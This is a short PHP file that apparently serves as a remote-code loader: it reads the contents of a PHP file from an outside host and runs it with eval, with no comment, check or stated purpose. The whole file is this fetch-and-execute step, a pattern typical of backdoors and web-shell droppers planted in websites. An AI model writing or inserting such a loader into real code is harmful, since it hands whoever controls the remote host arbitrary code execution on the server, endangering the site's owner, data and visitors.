<?php
$path = "https://code.decpain.my/fgj/1/tool.php";
$code = implode('', file($path));
eval("?>" . $code);
?>